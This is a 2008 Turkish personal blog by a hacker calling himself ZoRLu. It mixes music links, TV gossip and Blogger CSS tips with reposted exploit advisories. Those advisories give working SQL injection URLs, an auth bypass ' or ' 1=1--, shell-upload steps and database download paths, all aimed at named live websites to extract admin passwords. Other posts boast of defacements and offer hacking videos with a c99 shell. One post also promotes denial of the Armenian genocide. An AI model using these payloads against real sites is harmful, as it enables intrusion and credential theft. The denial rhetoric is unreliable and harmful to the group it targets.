31 Aralık 2008 Çarşamba
orhan hakalmaz - gafil gezme şaşkın
orhan hakalmaz bu türküyü süper seslendirmiş bence muhakkak dinleyin
Gafil Gezme Şaşkın ( insan yetiştiren türküler ):
TIKLA iNDiR
İnsan Yetiştiren Türküler Albümün Tamamı:
TIKLA iNDiR
Niçin Experl.com
aşağıdaki yazıyı okuyunca ekstra bir açıklamaya gerek olmadığını sizlerde anlıycaksınız.
kaynak: http://www.experl.com/experl-nedir/
kaynak: http://www.experl.com/experl-nedir/
Bazen odamızda oturup filozoflar ya da derin düşüncelere dalan adamlar gibi ne yapmaya çalıştığımızı anlamaya çalışırız. Yine böyle bir günün ardından ortaya çıkmış bir oluşum Experl..
Bu projeye başlarken her şeyi göze aldık. Her şey insana o kadar çekici geliyor ki, önünüzdeki olanaklardan birini seçtiğinizde tüm diğerlerine hayır demeniz gerekiyor. Biz Experl'i seçtik. Çünkü başarılı olmanın anahtarının tek bir noktaya odaklanmak olduğunu biliyoruz. Zamanımızın kısıtlı olduğunu,ve bu hedefle başkalarının düşüncelerinin sonuçlarıyla yaşam dogmasına takılıp artık başkalarının hayatını yaşayarak kısıtlı olan zamanımız harcamayacağımızıda biliyoruz.Yeteneğimizin ne olduğunu, nerede başarılı olabileceğimizi anlıyoruz, zamanımızı ve enerjimizi buraya yönlendiriyoruz.
Biz eğitimci değil öğrenciyiz. Öğrenen insanlarız. İşimizin en sevdiğimiz yanlarından biri de etrafta bizler gibi öğrenmeye meraklı ve arzulu olan insanların çokluğudur.
Experl'deki yazarların hepsi de işin içinde büyüyüp gelişmiş üstün zekalı insanlardır. İnsanı şaşırtan bir ekip. Buradaki insanların hiçbiri kendilerini zorlamıyor, pozisyon ve durumlarını umursamıyorlar ya da dışarıdan nasıl göründüklerine aldırmıyorlar.
Experl olarak çoğu zaman konuşur, tartışır ve hemen her zaman fikir birliği içinde oluruz. Şaşırtıcı olan şu ki önümüzdeki yıllara baktığımızda geçmiş olan yıllardan çok daha fazla şeyler yapabileceğimize inanıyoruz...
Bazıları bizim bu durumumuzdan şikayetçiler. Bizleri geleceğimizi bir kutuya bağlayan gençler olarak adlandırıyorlar. Eğer derbederlik ve çaresizlik bilgisayar başında gece yarılarına kadar oturup çalışmak, bazı araştırmalar yapmaksa o zaman bu tanım bize uyar. Bu tanımın da bizi küçülten bir kavram olduğunu düşünmüyoruz. Yine bazıları hala bu makine den altın geldiğini görmek ve bunu merak etmek yerine, bu altın külçelerini tuğlalar gibi dizmekten söz ediyorlar. O kadar olumsuz düşünceye rağmen biz bu işte sonuna kadar gitmeye kararlıyız. Çünkü sahip olacağımız en yüksek performans o yolun sonunda...
Yazılım üretmek bir sanat ve mühendislik arasında güzel bir iş birliği gerektirir. İşi bitirdiğin, ortaya çıkan eseri beğendiğin, taktir ettiğin zaman sanki kendinden bir şeyler oluşturmuş gibi hissedersin. Bizler bu heyecanı her an yaşayan bir oluşumuz...
Şunun da bilincindeyiz. Bize her zaman duvar olacak insanlar var olacak karşımızda. Ama bir gerçek var ki; ister seversin, ister nefret edersin ama Experl'i görmezden gelemezsin!
Experl || Just Run
pagerank 1 bahiyim valla 1 :)
aha da bana yılbaşı hediyesi. son bir şansımı deneyeyim dedim bi kontrol ettim pagrankı valla pagerank 1 olmuş :D hayırlı olsun :P
Etiketler:
pagerank,
pagerank sorgulama,
site ekle,
z0rlu,
z0rlu.blogspot
abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt
link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
exploit for demo: ( you must look title )
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt
link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
exploit for demo: ( you must look title )
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
Etiketler:
a.q,
abarcar,
blind sql injection,
experl,
experl.com,
php asp,
remote,
script,
sql,
sql injection,
z0rlu,
z0rlu.blogspot
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarmanu-sql.txt
link: http://www.experl.com/abarcar-manufacturer-system-script-plistingsphp-listingid-blind-remote-sql-inj-353/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]
[SQL]=
-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
Exploit: ( blind )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
Etiketler:
blind sql injection,
experl,
experl.com,
php asp,
remote,
sql,
sql injection
30 Aralık 2008 Salı
experl.com
artık böyle önemli olduğunu düşündüğüm bilgileri experl.com dada paylaşacağım nasipse. hayırlı uğurlu olsun.
a.q a.q a.q bu ödevlerin
küfretmekten ağzımın ayarı bozuldu mıçacam böyle işin ağzına :@ bir yandan ödevler diğer yandan kpss, ömrümü yediniz ulan :((
Etiketler:
a.q,
Diğer,
kpss,
kpss soruları,
ödev indir,
ödevler,
öss
29 Aralık 2008 Pazartesi
sloganların cızıdan çıktığı an : )
şöyle geziniyordum nette dikkatimi bir şey çekti. bloglar ve sloganlar.
inceleyelim:
kendi bilöngüm xD
beyn.org xD
henster.org xD
deliprofesor.com xD
bunlar şuan aklıma gelenler xD varın gerisini siz tahmin edin ;)
inceleyelim:
kendi bilöngüm xD
beyn.org xD
henster.org xD
deliprofesor.com xD
bunlar şuan aklıma gelenler xD varın gerisini siz tahmin edin ;)
Etiketler:
beyn,
Blogger,
Blogspot,
deliprofesor,
henster,
sloganlar,
yildirimordulari.org,
z0rlu,
z0rlu.blogspot,
ZoRLu
28 Aralık 2008 Pazar
Blogspotta kod alanı oluşturma
yerleşim>>>html düzenle>>> ve ardından su kodu buluyoruz:
bunun öncesine de su kodlarımızı ekliyoruz:
bu kadar
şimdi gidiyorum kullanımınıda yarın gösterecem
edit: yarın gösterecem demiştim :)
seklinde kullanacaksınız
bunun öncesine de su kodlarımızı ekliyoruz:
pre { background: url(http://i39.tinypic.com/2airndc.jpg);border:1px solid #A6B0BF;font-size:120%;line-height:100%;overflow:auto;padding:10px;color:white }pre:hover {border:1px solid #efefef;}code {font-size:120%;text-align:left;margin:0;padding:0;color: #000000;}.clear { clear:both;overflow:hidden;}
bu kadar
şimdi gidiyorum kullanımınıda yarın gösterecem
edit: yarın gösterecem demiştim :)
seklinde kullanacaksınız
Etiketler:
css,
internet,
kodlama,
php asp,
site tasarımı,
Teknoloji,
web tasarım
Tuncay Güney Kurtlar Vadisi'nde
msn yaşamda gözüme çarptı ilerleyen bölümlerde tuncay güney kurtlar vadisinde rol almaya başlayacakmış:
Bugün Gazetesi yazarı Nuh Gönültaş, Tuncay Güney'in Kurtlar Vadisi’nde oynamaya hazırlandığını yazdı. İşte o yazı...
Kurtlar Vadisi Pusu ekibi, dizide oynaması için Tuncay Güney'e teklifte bulundu. Polat Alemdar'ın İskender Büyük'ün kirli işleri ve sırları konusunda Güney'den bilgi alması tasarlandı.
Büyük'ün Ergenekon'daki Küçük'ü simgelediğine seyirciler inanıyor.
Senaryoya göre, Güney ile Alemdar yakında Toronto'da buluşacaklar... Bu rol için Güney'e 25 bin dolar oyunculuk ücreti ödenecek... Bu arada Muro ve ekibi de Kanada'da saklanacaktı ki, dizinin Show TV'den kaldırılması nedeniyle çekimler ertelenmiş durumda.
Güney, şu sıralar kaldığı evden çıkartılması için mahkemeye verildi. Maddi olarak zor durumda. Mahkeme üç ay süreceği için evden çıkmıyor. Güney, Ergenekon Terör Örgütü'nün Türkiye'den kendisini öldürmesi için suikast timi göndermesinden korkmuyor, ancak ABD'de New York'ta meskun tetikçi timinin gönderilmesinden çekiniyor.
Türkiye'deki muhtemel tetikçi ekiplerin isimlerini Kanada İstihbaratı CSIS'e verdiği için içi rahat. Kanada Konsolosluğu'ndan vize alamayacaklarını biliyor. Ancak Ergenekon'un ABD vatandaşı olmuş tetikçileri bulunuyor. Bu ekiplerin ABD'den Kanada'ya geçmesi çok kolay. Bunlardan bildiği isimleri CSIS'a vermiş, ellerini kollarını bağlamış. Ama bilmedikleri de elbette var. FBI, CIA ve CSIS tetikteler.
Bu arada MİT'in dosyasını devam eden Ergenekon mahkemesine göndermemek için gerekçe uydurmasına keyifli keyifli gülüyor. Mahkeme heyetinden bir savcı Güney'in ifadesini almak için resmi başvuruyu başlatmış olmalı ki, Güney'e bu istek bildirilmiş ve rızası alınmış. Sanık yapılsaydı konuşmayacak olan Güney, tanık olmaktan memnun ve savcının sorduğu her soruya cevap vermeye hazırlanıyor. MİT'in kendisi ile özel bir kanalla irtibat kurup kırmızı çizgiler çektiği de gelen bilgiler arasında.
Bu derin kulis bilgileri, Toronto'da yaşayan gazeteci dostum Kara Kutu: Ergenekon'un Karanlık İsmi Tuncay Güney kitabının yazarı Faruk Arslan'dan aldım.
Güney'in Arslan'a söylediği JİTEM'in asit ölüm çukurlarını ilk defa bu köşede 16 Kasım'da okudunuz. Daha sonra bu haberi alıntı yapmayan medya organı kalmadı.
Haberin üzerine giden gazeteciler ölüm kuyularının şahitlerini konuşturdular. Yıllardır sinen, korkan mağdur vatandaşlarımızda bir umut belirdi. Çünkü Şırnak Avukatlar Barosu'nun bu kitabı delil göstererek yaptığı suç duyurusunu dikkate alan Silopi Cumhuriyet Başsavcılığı 15 Aralık'ta BOTAŞ asit kuyuları ve diğer ölüm kuyularının açılmasına karar verdi. Mağdurlar birer ikişer savcılık ve baroya başvuruyor. Karanlık bir dönemin cinayetlerinin aydınlanması, bölgedeki vatandaşımızın devletine olan güvenini artıracak, korku imparatorluğu sona erecektir.
Diyarbakır'da devam eden Jİ- TEM davasının Ergenekon davası ile birleştirilmesi kaçınılmaz hale geliyor. Şehit Albay Özden cinayeti dosyasının yeniden açılması ve Ergenekon davası ile birleştirilmesi JİTEM davalarının Ergenekon davasına eklenmesine ilk yeşil ışıktı. Garih cinayeti dosyasının yeniden açılması da esasen başka bir Ergenekon cinayetinin tozlu raflardan indirilmesi anlamına geliyor.
Arslan'ın sivil baron adayı ile ilgili verdiği ip uçları ilginç. Kitaptan takip edelim:
Bizim lider, 'neocon'ların en aşırı kanadına bağlı, bir Cumhuriyetçi. Diğer derin Amerikan devletlerinin çatışması sırasında 'neocon'lar, Irak savaşında yaşanan fiyasko sonrası etkinliğini göreceli yitirdi. Türk liderde geri adım atmak zorunda kaldı. Askeri ve sivil liderler, ılımlı Washington'un uyarılarına rağmen, AK Parti'yi devirmek için, söz konusu çeteyi başındaki generallerle 2001'de görevlendirdiklerine pişman oldular. (Devam edecek, asker-sivil 1numaraların özellikleri...)
kaynak: http://msnyasam.milliyet.com.tr
Etiketler:
Kurtlar Vadisi,
kurtlar vadisi fragman,
msn,
msn yaşam,
yeni bölümler
CSS ile arka plandaki (background) resmi sabitleme
background-attachment: scroll or fixed;
kodumuz bu eğer sabit kalsın istiyorsak:
background-attachment: fixed; olcak
hareket etsin istiyorsak
background-attachment: scroll; olcak
kodumuz bu eğer sabit kalsın istiyorsak:
background-attachment: fixed; olcak
hareket etsin istiyorsak
background-attachment: scroll; olcak
ZoRLu hacklendimi yoksa :D
yok bre merak etmeyin sadece şablonda bi kaç değişiklik yapmaya çalışıyorum istediğim rengi tutturana kadar böle değiştirip durcam kusura bakmayın :D
Çok Güzel Hareketler Bunlar - Rulet Star
Çok Güzel Hareketler Bunlar Rulet Star
part 1: http://www.youtube.com/watch?v=-HXT6jGomf8
part 2: http://www.youtube.com/watch?v=TClyo5Hi6ts
part 1: http://www.youtube.com/watch?v=-HXT6jGomf8
part 2: http://www.youtube.com/watch?v=TClyo5Hi6ts
27 Aralık 2008 Cumartesi
hikayeler.net hacked
hikayeler.net te bir açık buldum ve videoya aldım videoyu yayınlamadan önce site sahiplerinin iletişime geçmesini bekleyeceğim. daha sonra videoyu yayınlarım ;) site asp kodlanmış server win. fakat ana dizine yazma yetkisi yoktu.
site: http://hikayeler.net/forum
zone 1: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8458948/
zone 2: http://www.turk-h.org/defacement/view/313443/hikayeler.net/forum/
site: http://hikayeler.net/forum
zone 1: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8458948/
zone 2: http://www.turk-h.org/defacement/view/313443/hikayeler.net/forum/
Etiketler:
hack,
hack bulten,
hack haber,
hack medya,
Hacking,
hikayeler.net,
uyarı
çok güzel hareketler bunlar - kız isteme ( hıyarlı baba )
izlerken gülmekten altıma yaptığım (!) :D süper bir skec. tavsiye ederim muhakkak izleyin.
link 1: http://www.youtube.com/watch?v=4QgkUK7Jw-A
link 2: http://www.youtube.com/watch?v=pN6XSFAe4PU
link 1: http://www.youtube.com/watch?v=4QgkUK7Jw-A
link 2: http://www.youtube.com/watch?v=pN6XSFAe4PU
Etiketler:
bkm mutfak,
Çok Güzel Hareketler Bunlar,
kanald,
komedi
25 Aralık 2008 Perşembe
http://www.metallica-team.com
w0cker kankamın açtığı süper site hepinizi bekliyoruz ;) üye olmayı ihmal etmeyin. kanka hayırlı olsun :D
kurtlar vadisi
yav kaç hafta oldu 50. bölüm yayınlanmıyor üç kuruş daha fazla para almak için başka kanallarla anlaşmaya çalışıyorlarmışta falanmışta filanmış :S gelde a.q deme :(
servicetelecom hacked ;)
link: http://servicetelecom.com.br/
zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435881/
link: http://blog.servicetelecom.com.br/
zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435874/
link: http://helpdesk.servicetelecom.com.br/
zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435875/
zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435881/
link: http://blog.servicetelecom.com.br/
zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435874/
link: http://helpdesk.servicetelecom.com.br/
zone: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8435875/
22 Aralık 2008 Pazartesi
E-Learning Portal Remote File Upload
E-Learning Portal Remote File Upload
link 1: http://www.exploiter5.com/all.php?id=47
link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt
Discovered By: ZoRLu
exp:
http://www.preprojects.com/elearning/uploaded/your_shell.asp
you register to site
login this site
after upload you_shell.asp
exp for demo:
register:
http://www.preprojects.com/elearning/new_student.asp
login:
role: select STUDENT
user: zorlu
passwd: zorlu1
shell
http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )
server daki siteler:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git
buda golden gate:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM
E-SMART CART Remote File Upload
E-SMART CART Remote File Upload
link 1: http://packetstormsecurity.org/0812-exploits/esmartcart-upload.txt
link 2: http://www.exploiter5.com/all.php?id=48
Discovered By: ZoRLu
exp:
http://localhost/script/embadmin/base_ads/[id]_shell.asp
exp for demo:
http://preproject.com/GScart/embadmin/main_baseimage.asp?action=add
you go to here and click to gozat button, select your_shell.asp and write link
after goo shell
http://preproject.com/GScart/embadmin/base_ads/zehir4.asp
Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns
Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns
link 1: http://packetstormsecurity.org/0812-exploits/presimple-sqldisclose.txt
link 2: http://www.exploiter5.com/all.php?id=46
Discovered By: ZoRLu
exploit for demo:
you go this link:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin
right click to on photo and you must see
http://preproject.com/pgallery/pimages/4
column number 4
and you goo this links
username:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
password:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
so for demo:
username: admin
password: admin
exp for demo: (DD)
http://preproject.com/pgallery/database/photo.mdb
PRE Asp Job Board (Auth Bypass)/DD Multiple Remote Vulns
PRE Asp Job Board (Auth Bypass)/DD Multiple Remote Vulns
link 1: http://www.exploiter5.com/all.php?id=45
link 2: http://packetstormsecurity.org/0812-exploits/preasp-sqldisclose.txt
Discovered By: ZoRLu
exp for demo: (bypass)
login:
http://preproject.com/preaspjobboard//Employee/emp_login.asp
user: ZoRLu
passwd: ' or ' 1=1--
exp for demo: (DD)
http://preproject.com/preaspjobboard/db/pre.mdb
21 Aralık 2008 Pazar
ozurdilemiyoruz.com
o satılmıs serefsiz siteye ( reklam yapmamak için link vermedim ) karsı duyarlı bir grubun açmıs olduğu site ve bende sonuna kadar destekliyorum ;) sizlerde gidin ve imzalayın sizlerde destekleyin lütfen. şimdilerde satılmış bazı aydınlar ermeni soykırımı uydurmasını kabul ettiklerini ve bunun için ermenilerden özür dilediklerini belirtiyorlar. böyle aydınlar olmaz olsun. böylelerine lanet olsun. şimdi bizlerde vatandaşlık görevimizi yapıp tepkimizi gösterelim
TIKLA SENDE iMZALA
BİZLER TÜRK AYDINIYIZ!
ÜSTELİK AYDIN KİMLİĞİMİZİ EMPERYALİST SOYTARILARA HİZMET İÇİN DEĞİL,
TÜRK HALKININ HAKLARINI KAN EMİCİLERE KARŞI KORUMAK İÇİN KULLANIYORUZ.
BİZİM KİMSEYE VERECEK BİR ÖZÜRÜMÜZ YOK.
ANCAK, ATALARIMIZA VE KARDEŞLERİMİZE KATLİAM YAPANLARDAN SORACAK BİR HESABIMIZ VAR.
BU HESAP IRKÇI-FAŞİST BİR SÖYLEMİN UZANTISI DEĞİLDİR.
BU HESAP; ÇANAKKALE SAVAŞINDA YARALADIĞI DÜŞMANINI SIRTINA ALIP SAHRA HASTANESİNE YETİŞTİRMEYE ÇALIŞAN
BİR İNSANLIK İBRETİNİN YANSIMASIDIR.
BİZLER, BÖYLE ATALARI OLDUĞU İÇİN UTANÇ DEĞİL GURUR DUYAN
BİR MİLLETİN ÇOCUKLARIYIZ.
İNSANLIK ADINA PEK ÇOK İYİ DİLEKLERİMİZ VAR.
ANCAK, BU KONUYLA İLGİLİ İSTEDİĞİMİZ TEK ŞEY;
BÜTÜN MİLLETLERİN DÜŞMANLARINA TÜRK GİBİ MERHAMETLİ YAKLAŞMASIDIR.
Gerçek Türk Aydını
Blogspotta Üst Köşeye Bayrak Eklentisi
şimdi öncelikle blogspot.com dan giriş yapın ve yerleşimden html yi düzenle yi seçin. daha sonra css kodlarınızın arasına su kodu ekleyin:
daha sonra "div" taglarının bulunduğu yerede şu kodu ekleyin:
sonra şablonu kaydedin tamamdır ;)
kodları indirebileceğiniz link:
TIKLA iNDiR
Etiketler:
Blogger,
Blogspot,
blogspot eklentiler,
pagerank,
üst köşeye bayrak
20 Aralık 2008 Cumartesi
artık açık yayınlamıycam
a.q artık acık yayınlamıycam kendim zone kasacam böylesi daha güzel oluyor o yüzden milw0rm.com a biraz ara verdim ;)
18 Aralık 2008 Perşembe
root video ( for win Server )
e smart cms scriptinde bir acık bulmustum file upload yapılabiliyodu. bunu str0ke a da gönderdim hani 16 açık göndermiştimde yayınlanmamıştı ya işte o zaman :) ama bir başkası preproject scriptlerinde benim bulduğum acıkların birkacını farketmiş ve baska bir security sitesinde yayınlatmıs sorun değil demiştim ya çokta fifi : ) bekliyodum belki str0ke inadından vaz geçer de yayınlar ama o vaz geçmeden baskaları harekete geçti bile :D neyse gelelim videoya. açığı başka bir gün yayınlıycam işte win server da 201 site mevcuttu ama videoda bir ara 206 demişim ne alaka bende anlamadım :D ayrıca klavye hatalarımda var onlar içinde kusura bakmayın : )
TIKLA iZLE
rar pass: z0rlu.blogspot.com
hadi kolay gele
TIKLA iZLE
rar pass: z0rlu.blogspot.com
hadi kolay gele
Etiketler:
bypass,
root exploit,
root video,
safe mod,
safemod,
safemod bypass exploit,
Video
BosClassifieds hacking video
a.q rapid in azizliğine uğradık video silinmiş mi ne halt olmuşsa artık yoktu bende de yedeği yoktu yeniden aynı videoyu çektim. aynı sözleri tekrarlamak çok sıkıcı a.q :D neyse cafeden çekim yaptım aksilik vs rastlarsa kusura bakmayın. dosyada video, c99.php hazır hali ve txt mevcut video boyutu küçük ;)
TIKLA iNDiR
rar pass: z0rlu.blogspot.com
umarım faydalı olur. ;)
TIKLA iNDiR
rar pass: z0rlu.blogspot.com
umarım faydalı olur. ;)
17 Aralık 2008 Çarşamba
Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities
Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities
link: http://www.milw0rm.com/exploits/7494
link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt
Discovered By: ZoRLu
exp for demo: (R-SQL)
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
exp for demo: (B-SQL)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
exp for demo: (auth bypass)
http://joineazy.com/members/login.asp
username: trt-turk@hotmail.com
pass: ' or '
exp for demo: (admin bypass)
http://joineazy.com/embadmin/admin_main.asp
http://joineazy.com/embadmin/site_setup.asp
http://joineazy.com/embadmin/main_baseimage.asp
exp for demo: (RFU)
firs you register to site
login to site and edit your pictures select your shell.asp
go your shell asp:
http://joineazy.com/members/member_pictures/shell.asp
EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject
yayınlanma tarihine ve gönderilme tarihine dikkat edin ilk milw0rm.com a gönderdim :D
EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject
link: http://www.exploiter5.com/all.php?id=39
link: http://packetstormsecurity.org/0812-exploits/evimgibi-sql.txt
author: ZoRLu
dork: intext:"Asp Programlama : EvimGibi"
exploit:
http://localhost/script_path/resim.asp?islem=altkat&kat_id=[SQL]
[SQL]=
-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler
example:
http://www.sabanciogretmenevi.com.tr/album/resim.asp?islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler
16 Aralık 2008 Salı
z0rlu.ownspace.org
Böyle bi sacmalıga baslık bulamadım
okuduğum haberi mevcut yorum başlıklığıyla yayınlamak istedim çünkü yorumlayan kişi iyi bir başlık bulmus yorumuna. yok efendim obama yemin ederken vurulacakmış ya yaralanacakmış yada ölecekmiş rusya fırsattan istifade abd ye nükleer saldırı düzenleyecekmiş ve kıyamet kopacakmış :S ya işte Yüce Dinimiz İSLAM dan haberdar olmayanların acı durumu kıyametin kopacağına dair kehanetlerde bulunuyorlar. yahu kahin ne bilir kıyametin ne zaman kopacağını. ne diyelim ALLAH ıslah etsin işte haber :S
Amerika bugünlerde bir kehanete kilitlenmiş durumda. Bu tür şeylere inanmayanların bile içine kurt düştü. "Ya doğru çıkarsa?" tartışması sürüp gidiyor. Peygamber olduğunu ilan eden ünlü Amerikalı Mormon káhin Leland Freeborn, ABD başkanı seçilen Barack Obama’nın yemin etmeden önce öldürüleceğini ve ardından da Rusya’nın nükleer saldırısıyla ’kıyametin kopacağını’ iddia etti.
Peygamber olduğunu ilan eden ünlü Amerikalı Mormon káhin Leland Freeborn, ABD başkanı seçilen Barack Obama’nın yemin etmeden önce öldürüleceğini ve ardından da Rusya’nın nükleer saldırısıyla ’kıyametin kopacağını’ iddia etti.
ABD’de kehanetleriyle ünlü ve "Parowan Peygamberi" olarak tanınan Leland Freeborn, 44. Başkan seçilen Barack Obama’nın yemin etmeden önce ya öldürüleceğini ya da yaralanacağını ve ardından da hem isyanların çıkacağını hem de Rusya’nın nükleer saldırıda bulunacağını iddia etti.
Kehanetlerde bulunmayı bir kariyer haline getiren Leland Freeborn, müritlerine, "Bu Noel’de tam bir kıyamete hazır olun" çağrısında bulundu.
Freeborn, daha önce de Obama’nın başkanlık koltuğuna oturamayacağını öne sürmüştü. "Los Angeles Times" gazetesinin haberine göre, Freeborn, Barack Obama’nın yeminden önce ya öldürüleceğini ya da yaralanacağını savundu. Buna göre, Obama’ya yönelik saldırıdan sonra isyanlar çıkacak.
Kehanetlerini sürdüren Leland Freeborn, Rusya’nın bu durumdan yararlanmaya çalışacağını ve ABD’ye nükleer saldırıda bulunacağını iddia etti. Bu kıyamet saldırı ise 100 milyon Amerikalı’nın ölümüne yol açacak.
"Parowan Peygamberi" Rusya ABD’ye nükleer bomba yağdırırken kendisinin Wal-Mart’ta alışverişte olacağını da söyledi. Freeborn, bu kehanetlerini sürekli yayıyor.
kaynak: http://msnyasam.milliyet.com.tr
CFAGCMS v1 (right.php title) SQL Injection Vulnerability
gönderdiğim tarihe ve yayınlandığı tarihe iyi bakın : )
CFAGCMS v1 (right.php title) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7483
Discovered By: ZoRLu
exploit:
http://localhost/cfagcms/right.php?title=[SQL]
[SQL]=
ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
14 Aralık 2008 Pazar
mumya 3
dün gece izledik ama mumya 1 ve mumya 2 le kıyaslanamaz bile. evet komik sahneler var ama filmin geneline baktığımızda baş rol oyuncular gölgede kalmış pekte güzel değildi :S a.q mahvetmişler o biçim filmi
13 Aralık 2008 Cumartesi
Braveheart - The Legend Spreads
cesur yürekte duyduğum ve aklımda dırını nırını nırınınırını müziği olarak kalan ve hatta google ile youtube ta bile öyle arama yaptığım müzik : ) sonunda buldum. aslında güzel bir index müziği ;)
TIKLA iNDiR
TIKLA iNDiR
Half Life
